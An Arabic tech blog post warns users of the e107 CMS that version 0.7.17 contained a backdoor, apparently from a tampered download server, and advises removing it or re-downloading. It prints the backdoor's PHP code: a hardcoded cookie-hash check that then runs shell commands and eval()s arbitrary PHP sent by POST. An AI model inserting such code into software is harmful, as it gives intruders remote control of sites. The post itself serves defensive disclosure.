اكتشاف Backdoor في آخر إصدار من نظام إدارة المحتوى e107

الوقت المقدّر لقراءة هذا المقال: 1 دقيقة و 59 ثانية

اكتشاف Backdoor في آخر إصدار من نظام إدارة المحتوى e107

إذا كنت من هواة أنظمة إدارة المحتوى أو ما يعرف اختصارا بـ CMS و كنت أحد مستعملي نظام e107 فإنه يستحسن أن تتحقق من آخر إصدار من نظام e107 حيث أن تحاليل أثبتت احتواءه على Backdoor.

حيث نصح Bogdan Calin العامل لدى Acunetix بتجنب استعمال  الإصدار 0.7.17 التي صدرت حديثا لأنها تحوي الشيفرة التالية:

if(md5($_COOKIE[‘access-admin’]) == “cf1afec15669cb96f09befb7d70f8bcb”) {

if(!empty($_POST[‘cmd’])){
$out = execute($_POST[‘cmd’]);
}

elseif(!empty($_POST[‘php’])){
ob_start();
eval($_POST[‘php’]);
$out = ob_get_contents();
ob_end_clean();
}

في الملف class2.php .

و هو ما يعني استعمال لـ Cookie ثابت يسهل عملية اختراق النظام و الحصول على صلاحيات المدير.

من المرجح أن سبب وجود الـ Backdoor هو تعرض أحد الخوادم التي يُحمَّل منها النظام إلى تغيير في المحتوى.

إذا كنت تستعمل هذا النظام و كنت قد نصبت هذا الإصدار، كل ما عليك هو حذف الشيفرة المبنية أعلاه من الملف المصاب، أو إعادة تحميل النظام من جديد و الذي تم تصحيح الخلل فيه.

يمكن الإطلاع على تفاصيل الثغرة من هنا و هنا

–   هل تستعمل أنظمة إدارة المحتوى بصفة عامة و نظام e107 خاصة ؟

–   هل أنت من مؤيدي أنظمة أدارة المحتوى؟ أم تفضل كتابة جميع صفحات موقعك من الصفر؟


هل أعجبك هذا المقال؟ أخبر أصدقاءك عنه Share on Facebook0Tweet about this on TwitterShare on Google+0Share on LinkedIn0Buffer this pageEmail this to someoneShare on Reddit0Share on Tumblr0
وسوم: backdoorcmse107

عن كاتب المقال:

مبرمج جزائري، مهتم بمجال تطوير الويب. يُحرر كلا من المجلة التقنية ، مدونة الإعلام الاجتماعي ومدونة دروس الويب.

تابع الكاتب على:
Twitter +Google